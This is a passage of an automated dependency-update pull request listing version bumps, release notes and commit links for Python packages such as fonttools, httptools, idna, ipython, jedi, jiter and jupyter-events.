href=\"https://github.com/fonttools/fonttools/commit/382a35fb5e96c6ff38a1e7775a24e20bf122a66d\"\u003e\u003ccode\u003e382a35f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4090\"\u003e#4090\u003c/a\u003e from fonttools/fix-freethreading-compat\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fonttools/fonttools/commit/0e999b55f05ad0dd8423f389673a32de9c5199bb\"\u003e\u003ccode\u003e0e999b5\u003c/code\u003e\u003c/a\u003e Declare Cython extensions as free-threading compatible\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fonttools/fonttools/commit/9e55ea54c184b0d4c0830525f72e69c6c1a32691\"\u003e\u003ccode\u003e9e55ea5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4089\"\u003e#4089\u003c/a\u003e from fonttools/graphite-feat-labels\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fonttools/fonttools/commit/e84db3ab426a251256ebec7904c03dc73e25932b\"\u003e\u003ccode\u003ee84db3a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4088\"\u003e#4088\u003c/a\u003e from fonttools/fix-setUnicodeRanges-bits-123-127\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fonttools/fonttools/commit/d6eabd1edf7bfa950b6b85c393e4c185dee36d7f\"\u003e\u003ccode\u003ed6eabd1\u003c/code\u003e\u003c/a\u003e Feat: show name table strings as comments next to label IDs in ttx\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fonttools/fonttools/commit/7d0902b2e27ec1433b015b3b8a79391d7c8604cb\"\u003e\u003ccode\u003e7d0902b\u003c/code\u003e\u003c/a\u003e OS/2: fix setUnicodeRanges round-trip for reserved bits 123-127\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fonttools/fonttools/commit/06e266ce70ec578d549c2df0e180a84d9323baf2\"\u003e\u003ccode\u003e06e266c\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/fonttools/fonttools/issues/4085\"\u003e#4085\u003c/a\u003e from fonttools/fix-map-backward-non-injective\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fonttools/fonttools/commit/6d64598a63f83bcd59d29cf3f22dd25343bd9688\"\u003e\u003ccode\u003e6d64598\u003c/code\u003e\u003c/a\u003e Add more tests for map_backward with many-to-one axis maps\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/fonttools/fonttools/compare/4.62.1...4.63.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `httptools` from 0.7.1 to 0.8.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/MagicStack/httptools/releases\"\u003ehttptools's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.8.0\u003c/h2\u003e\n\u003ch1\u003eChanges\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd http-parser and llhttp licenses into the wheels (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/135\"\u003e#135\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/justeph\"\u003e\u003ccode\u003e@​justeph\u003c/code\u003e\u003c/a\u003e in c398a157)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eMark cython module as free-threading compatible (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/139\"\u003e#139\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/kumaraditya303\"\u003e\u003ccode\u003e@​kumaraditya303\u003c/code\u003e\u003c/a\u003e in 28d1db15)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix all typing issues (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/134\"\u003e#134\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/Kludex\"\u003e\u003ccode\u003e@​Kludex\u003c/code\u003e\u003c/a\u003e in a9bda0ed)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eBump llhttp to 9.4.1 (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/145\"\u003e#145\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/fantix\"\u003e\u003ccode\u003e@​fantix\u003c/code\u003e\u003c/a\u003e in e3e8d71e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSecurity: fix URL truncation issue (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/144\"\u003e#144\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/fantix\"\u003e\u003ccode\u003e@​fantix\u003c/code\u003e\u003c/a\u003e in a0283f07 for \u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/142\"\u003e#142\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAllow building with latest setuptools (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/138\"\u003e#138\u003c/a\u003e)\n(by \u003ca href=\"https://github.com/OldManYellsAtCloud\"\u003e\u003ccode\u003e@​OldManYellsAtCloud\u003c/code\u003e\u003c/a\u003e in c403ad1a)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/cf10ce6f0dae56e61817e67b9bb073dd39d0191a\"\u003e\u003ccode\u003ecf10ce6\u003c/code\u003e\u003c/a\u003e httptools 0.8.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/a0283f07c8a7a3f81e26135283daa25e4baba3af\"\u003e\u003ccode\u003ea0283f0\u003c/code\u003e\u003c/a\u003e security: fix URL truncation issue (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/144\"\u003e#144\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/05e6b8e9cf71fed8fa0e4796a2c1a52351b2e182\"\u003e\u003ccode\u003e05e6b8e\u003c/code\u003e\u003c/a\u003e ci: add freethreading 3.14 to the CI matrix (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/146\"\u003e#146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/e3e8d71ee946937209aa965400cc2a8710520215\"\u003e\u003ccode\u003ee3e8d71\u003c/code\u003e\u003c/a\u003e Bump llhttp to 9.4.1 (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/145\"\u003e#145\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/a9bda0edb93da51c68cbf6db791c958166b86249\"\u003e\u003ccode\u003ea9bda0e\u003c/code\u003e\u003c/a\u003e Fix all typing issues (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/134\"\u003e#134\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/28d1db15eaeaab5bc7d376d2c2035d966b6e1378\"\u003e\u003ccode\u003e28d1db1\u003c/code\u003e\u003c/a\u003e mark cython module as free-threading compatible (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/139\"\u003e#139\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/c403ad1ad6cc9345834269a0611b74c6ee4bdcfa\"\u003e\u003ccode\u003ec403ad1\u003c/code\u003e\u003c/a\u003e Allow building with latest setuptools (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/138\"\u003e#138\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/c398a1579a30ba12b5aeed2d7163644947514590\"\u003e\u003ccode\u003ec398a15\u003c/code\u003e\u003c/a\u003e Add http-parser and llhttp licenses into the wheels (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/135\"\u003e#135\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/4cfdabd31ccfd5ccf9ab8c60992b4348ebcf5a84\"\u003e\u003ccode\u003e4cfdabd\u003c/code\u003e\u003c/a\u003e ci: fix release workflow (\u003ca href=\"https://redirect.github.com/MagicStack/httptools/issues/132\"\u003e#132\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MagicStack/httptools/commit/ef71da977cde416fcbd570393fe0c1e22d26b56f\"\u003e\u003ccode\u003eef71da9\u003c/code\u003e\u003c/a\u003e Post-release version bump\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/MagicStack/httptools/compare/v0.7.1...v0.8.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `idna` from 3.11 to 3.18\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kjd/idna/blob/master/HISTORY.md\"\u003eidna's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.18 (2026-06-02)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eWhen decoding a domain, add a \u003ccode\u003edisplay\u003c/code\u003e argument that will pass\nthrough invalid labels rather than raising an exception.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.17 (2026-05-28)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSubstantial 75% reduction in memory usage through new data\nstructures and some optimization in processing speed.\u003c/li\u003e\n\u003cli\u003eAdded a general 1024-character input length cap to the public\nvalidation, conversion, and codec entry points. This is well above\nany legitimate domain or label and guards against pathological\ninputs.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.16 (2026-05-22)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd a command-line interface (\u003ccode\u003epython -m idna\u003c/code\u003e, also available as\nthe \u003ccode\u003eidna\u003c/code\u003e script). Encodes or decodes one or more domains supplied\nas arguments or on standard input, with options to select A-label\nor U-label output and control error handling.\u003c/li\u003e\n\u003cli\u003eRaise the minimum supported Python version to 3.9\u003c/li\u003e\n\u003cli\u003eVarious code quality improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.15 (2026-05-12)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnforce DNS-length cap on individual labels early in \u003ccode\u003echeck_label\u003c/code\u003e,\nshort-circuiting contextual-rule processing for oversized input\nwhile staying compatible with UTS 46 usage.\u003c/li\u003e\n\u003cli\u003eTidy core helpers: hoist bidi category sets to module-level\nfrozensets (avoiding per-codepoint list construction), simplify\nlength checks, and reuse the shared \u003ccode\u003e_unicode_dots_re\u003c/code\u003e from\n\u003ccode\u003eidna.core\u003c/code\u003e in the codec module.\u003c/li\u003e\n\u003cli\u003eUse \u003ccode\u003eraise ... from err\u003c/code\u003e for proper exception chaining and\nswitch internal string formatting to f-strings.\u003c/li\u003e\n\u003cli\u003eAllow \u003ccode\u003eflit_core\u003c/code\u003e 4.x in the build backend.\u003c/li\u003e\n\u003cli\u003eExpand the ruff lint set (flake8-bugbear, flake8-simplify,\npyupgrade, perflint) and apply the surfaced fixes; pin lint CI\nto Python 3.14.\u003c/li\u003e\n\u003cli\u003eAdd Dependabot configuration for GitHub Actions.\u003c/li\u003e\n\u003cli\u003eConvert README and HISTORY from reStructuredText to Markdown.\u003c/li\u003e\n\u003cli\u003eReference CVE-2026-45409 for the 3.14 advisory in place of the\ninitial GHSA identifier.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThanks to Felix Yan, Stan Ulbrych, and metsw24-max for\ncontributions to this release.\u003c/p\u003e\n\u003ch2\u003e3.14 (2026-05-10)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRemoved opportunity to process long inputs into quadratic\ntime by rejecting oversize inputs up-front. Closes a bypass\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/f39ea903ba49eb5a0b2c6723c9a929b41ed4a0f1\"\u003e\u003ccode\u003ef39ea90\u003c/code\u003e\u003c/a\u003e Release 3.18\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/40f4e407bc7452da37c24b0c112dcda9a5b299ba\"\u003e\u003ccode\u003e40f4e40\u003c/code\u003e\u003c/a\u003e Pre-release 3.18rc0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/1a5bf80f2fa40454589e6144efe5f72015ef9d24\"\u003e\u003ccode\u003e1a5bf80\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/253\"\u003e#253\u003c/a\u003e from kjd/lenient-decode\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/5bbb26fc86e28c4ee1434ae8ae8db76de4c2a5ac\"\u003e\u003ccode\u003e5bbb26f\u003c/code\u003e\u003c/a\u003e Merge branch 'master' into lenient-decode\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/c532bae5270489cef8faf9f6b1eb70cbcb454c6d\"\u003e\u003ccode\u003ec532bae\u003c/code\u003e\u003c/a\u003e Rename decode() lenient= option to display= (issue \u003ca href=\"https://redirect.github.com/kjd/idna/issues/248\"\u003e#248\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/0b1758ba11952a2e88fd6141ffa620409bff0580\"\u003e\u003ccode\u003e0b1758b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/252\"\u003e#252\u003c/a\u003e from kjd/release-3.17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/f48619c4cea6859b938d560fdd9feb898e678567\"\u003e\u003ccode\u003ef48619c\u003c/code\u003e\u003c/a\u003e Release 3.17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/7421ba8003227f816142ab40178e3a7d204e6847\"\u003e\u003ccode\u003e7421ba8\u003c/code\u003e\u003c/a\u003e Pre-release 3.17rc0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/22ebb73b164081f209449b50162eb7ce086e96a4\"\u003e\u003ccode\u003e22ebb73\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/kjd/idna/issues/251\"\u003e#251\u003c/a\u003e from kjd/structure-optimizations\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kjd/idna/commit/2a7ac0a58c788d50112a5003af545a83807fb108\"\u003e\u003ccode\u003e2a7ac0a\u003c/code\u003e\u003c/a\u003e Drop redundant parallel-arrays comment from uts46data\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/kjd/idna/compare/v3.11...v3.18\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ipython` from 9.12.0 to 9.14.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/352c35b9e841fe20c2a0dc09af67e180e6854322\"\u003e\u003ccode\u003e352c35b\u003c/code\u003e\u003c/a\u003e release 9.14.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/df72b1f8d94e874947f6425dbbcca614942aa3f5\"\u003e\u003ccode\u003edf72b1f\u003c/code\u003e\u003c/a\u003e Add forward compatibility for pdb.Pdb's mode argument (\u003ca href=\"https://redirect.github.com/ipython/ipython/issues/15235\"\u003e#15235\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/a957d81c3177d33fc9d0b5fe123e58dd8cbf87e7\"\u003e\u003ccode\u003ea957d81\u003c/code\u003e\u003c/a\u003e Handle pdb.Pdb \u003ccode\u003emode\u003c/code\u003e argument and test signature compatibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/3e1c0544e141d55cd232259d4828a633e952f5fc\"\u003e\u003ccode\u003e3e1c054\u003c/code\u003e\u003c/a\u003e ci: add zizmor GitHub Actions security analysis and harden workflows (\u003ca href=\"https://redirect.github.com/ipython/ipython/issues/15238\"\u003e#15238\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/0181ae38b68b929f464c349ad139e1080ee60a93\"\u003e\u003ccode\u003e0181ae3\u003c/code\u003e\u003c/a\u003e ci: add zizmor GitHub Actions security analysis and harden workflows\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/fb831cc06fe27a12f5d52f6608fa90857428748c\"\u003e\u003ccode\u003efb831cc\u003c/code\u003e\u003c/a\u003e back to dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/9d1f24b9687279362b66f4e8c8a36ffde895a05d\"\u003e\u003ccode\u003e9d1f24b\u003c/code\u003e\u003c/a\u003e release 9.14.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/d8b9d11f2796300d914a88dc08de35ce93bc5aa0\"\u003e\u003ccode\u003ed8b9d11\u003c/code\u003e\u003c/a\u003e Add IPython 9.14 release notes (\u003ca href=\"https://redirect.github.com/ipython/ipython/issues/15228\"\u003e#15228\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/80cc1b963349ebc472b69f7da505cccebb2e6ad5\"\u003e\u003ccode\u003e80cc1b9\u003c/code\u003e\u003c/a\u003e Apply suggestions from code review\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/99feaadc543d43abc9287734651f4b618305a6bb\"\u003e\u003ccode\u003e99feaad\u003c/code\u003e\u003c/a\u003e Prepare release notes for 9.14\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ipython/ipython/compare/9.12.0...9.14.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jedi` from 0.19.2 to 0.20.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/davidhalter/jedi/blob/master/CHANGELOG.rst\"\u003ejedi's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e0.20.0 (2026-05-02)\n+++++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ePython 3.14 support\u003c/li\u003e\n\u003cli\u003eRemoved support for Python 3.8 and 3.9\u003c/li\u003e\n\u003cli\u003eUpgraded Typeshed\u003c/li\u003e\n\u003cli\u003eBetter support for Final/ClassVar\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e__new__\u003c/code\u003e is now also recognized as a signature and TypeVar inference\u003c/li\u003e\n\u003cli\u003eSupport for \u003ccode\u003eSelf\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eSupport for \u003ccode\u003eTypeAlias\u003c/code\u003e, generics for \u003ccode\u003etype[...]\u003c/code\u003e and \u003ccode\u003etuple[...]\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/3102215478fe07b965dcd8221c17436d1dd7e8ac\"\u003e\u003ccode\u003e3102215\u003c/code\u003e\u003c/a\u003e Move the type parameter syntax tests so that it works for all versions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/1b37f2eb946e825cbc2887c6dd34ee046f0ae68c\"\u003e\u003ccode\u003e1b37f2e\u003c/code\u003e\u003c/a\u003e Prepare for the 0.20.0 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/8e4df5cc0ec511db1af6d358182b1fb7c1e0cbff\"\u003e\u003ccode\u003e8e4df5c\u003c/code\u003e\u003c/a\u003e Make sure the new generic syntax does not fail with latest parso\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/4c9dbcca0329454b638bfa32e2825bedcfdf0eac\"\u003e\u003ccode\u003e4c9dbcc\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/davidhalter/jedi/issues/2098\"\u003e#2098\u003c/a\u003e from davidhalter/updates\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/fedb1a5eb0d74446f6d431db2920ab5f1e1d5b18\"\u003e\u003ccode\u003efedb1a5\u003c/code\u003e\u003c/a\u003e Fix 3.10 tests in one more case\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/87e782f9c82de7297e243a770ac8888570bffa8e\"\u003e\u003ccode\u003e87e782f\u003c/code\u003e\u003c/a\u003e Fix flake8\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/cd52d982e10ac54f0ebef06e0bd414f79589998a\"\u003e\u003ccode\u003ecd52d98\u003c/code\u003e\u003c/a\u003e Fixes to get the tests passing for 3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/d0b11806d4d1def377234bc2dc512992c997a977\"\u003e\u003ccode\u003ed0b1180\u003c/code\u003e\u003c/a\u003e Finally make tests work for 3.14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/8520a9958b489bd8d30cf20b4d2798f7289aab45\"\u003e\u003ccode\u003e8520a99\u003c/code\u003e\u003c/a\u003e Implement support for TypeVar inference for \u003cstrong\u003enew\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/55e5f0cb92dd92d5bdc80ecfc38664a1afd921d1\"\u003e\u003ccode\u003e55e5f0c\u003c/code\u003e\u003c/a\u003e Implement new-style unions with TypeVars\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/davidhalter/jedi/compare/v0.19.2...v0.20.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jiter` from 0.14.0 to 0.15.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/jiter/commit/0bb22aa6b3a4d729e6c7bae74c05a5d0f1f654b0\"\u003e\u003ccode\u003e0bb22aa\u003c/code\u003e\u003c/a\u003e release: 0.15.0 (\u003ca href=\"https://redirect.github.com/pydantic/jiter/issues/251\"\u003e#251\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pydantic/jiter/commit/0f3e5eb48a5fff16d825f9af2ea7c6748bbdfbb8\"\u003e\u003ccode\u003e0f3e5eb\u003c/code\u003e\u003c/a\u003e expose \u003ccode\u003eknown_number_bytes\u003c/code\u003e and parser methods for bytes -\u0026gt; number (\u003ca href=\"https://redirect.github.com/pydantic/jiter/issues/250\"\u003e#250\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/pydantic/jiter/compare/v0.14.0...v0.15.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jupyter-events` from 0.12.0 to 0.12.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jupyter/jupyter_events/releases\"\u003ejupyter-events's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.12.1\u003c/h2\u003e\n\u003ch2\u003e0.12.1\u003c/h2\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/jupyter_events/compare/v0.12.0...69306b1d1577a1a71ba27a4b12314fa31771ee71\"\u003eFull Changelog\u003c/a\u003e)\u003c/p\u003e\n\u003ch3\u003eBugs fixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Bug] Fix empty error messages from failing event listeners \u003ca href=\"https://redirect.github.com/jupyter/jupyter_events/pull/118\"\u003e#118\u003c/a\u003e (\u003ca href=\"https://github.com/Zsailer\"\u003e\u003ccode\u003e@​Zsailer\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance and upkeep improvements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd security.md \u003ca href=\"https://redirect.github.com/jupyter/jupyter_events/pull/113\"\u003e#113\u003c/a\u003e (\u003ca href=\"https://github.com/Carreau\"\u003e\u003ccode\u003e@​Carreau\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors to this release\u003c/h3\u003e\n\u003cp\u003eThe following people contributed discussions, new ideas, code and documentation contributions, and review.\nSee \u003ca href=\"https://github-activity.readthedocs.io/en/latest/use/#how-does-this-tool-define-contributions-in-the-reports\"\u003eour definition of contributors\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/jupyter_events/graphs/contributors?from=2025-02-03\u0026amp;to=2026-04-20\u0026amp;type=c\"\u003eGitHub contributors page for this release\u003c/a\u003e)\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/Carreau\"\u003e\u003ccode\u003e@​Carreau\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fjupyter_events+involves%3ACarreau+updated%3A2025-02-03..2026-04-20\u0026amp;type=Issues\"\u003eactivity\u003c/a\u003e) | \u003ca href=\"https://github.com/Zsailer\"\u003e\u003ccode\u003e@​Zsailer\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://github.com/search?q=repo%3Ajupyter%2Fjupyter_events+involves%3AZsailer+updated%3A2025-02-03..2026-04-20\u0026amp;type=Issues\"\u003eactivity\u003c/a\u003e)\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jupyter/jupyter_events/blob/main/CHANGELOG.md\"\u003ejupyter-events's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.12.1\u003c/h2\u003e\n\u003cp\u003e(\u003ca href=\"https://github.com/jupyter/jupyter_events/compare/v0.12.0...69306b1d1577a1a71ba27a4b12314fa31771ee71\"\u003eFull Changelog\u003c/a\u003e)\u003c/p\u003e\n\u003ch3\u003eBugs fixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Bug] Fix empty error messages from failing event listeners \u003ca href=\"https://redirect.github.com/jupyter/jupyter_events/pull/118\"\u003e#118\u003c/a\u003e (\u003ca href=\"https://github.com/Zsailer\"\u003e\u003ccode\u003e@​Zsailer\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance and upkeep improvements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd security.md \u003ca href=\"https://redirect.github.com/jupyter/jupyter_events/pull/113\"\u003e#113\u003c/a\u003e (\u003ca href=\"https://github.com/Carreau\"\u003e\u003ccode\u003e@​Carreau\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors to this release\u003c/h3\u003e\n\u003cp\u003eThe following people contributed discussions, new ideas, code and documentation contributions, and review.\nSee \u003ca href=\"https://github-activity.readthedocs.io/en/latest/use/#how-does-this-tool-define-contributions-in-the-reports\"\u003eour definition of contributors\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003e(\u003ca 